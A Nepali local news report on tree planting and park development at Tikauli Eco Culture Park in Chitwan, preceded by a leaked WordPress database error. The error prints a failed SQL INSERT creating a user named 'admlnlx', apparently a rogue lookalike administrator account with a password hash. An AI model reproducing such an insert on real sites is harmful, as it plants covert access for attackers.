WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6dtkCy0jJJni9gkOpAED1QYRCZROV.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:53:41', '', 'admlnlx', 'admlnlx')
चितवन , पौष ९
टिकौली इको कल्चर पार्कमा वृक्षारोपण गरिएको छ । जैविक विविधता संरक्षणसंगै आरामदायी स्थलको रुपमा विकास गर्ने उदेश्यका साथ रत्ननगर ७ मा पार्क निर्माणको काम भईरहेको छ । सोही ठाँउमा आज एक कार्यक्रमको आयोजना गरी चितवन राष्ट्रिय निकुञ्जका प्रमुख संरक्षण अधिकृत रामचन्द्र कंडेलले विरुवा रोपेर उद्घाटन गरे ।
सो अवसरमा प्रमुख संरक्षण अधिकृत कडेंलले अतिक्रमित जग्गा संरक्षण गरेर पार्क निर्माण गर्नु महत्वपुर्ण रहेको भन्दै यसबाट जैविक विविधता संरक्षण हुने धारणा राखे । त्यस्तै मृगकुञ्ज मध्यवर्ती उपभोक्ता समितिका अध्यक्ष वासुदेव ढुङ्गानाले पार्कले वन र पर्यापर्यटनलाई जोड्ने काम गर्ने वताए । रत्ननगर नगरपालिकाको सक्रियतामा केही समय अघि सो क्षेत्र नक्साङ्कन गरी तारवार गरेर संरक्षण गरिएको थियो ।
करिव ७ विगाहा जग्गालाई संरक्षण गरिएको र २ विगाहामा पार्क निर्माण निर्माण गरिने टिकौली मध्यवर्ती सामुदायिक वन उपभोक्ता समुहका अध्यक्ष वुद्धिमान विकले जानकारी दिए । यसअघि पनि त्यहाँ करिव एक सय प्रजातिका विरुवाहरु रोपिएको छ ।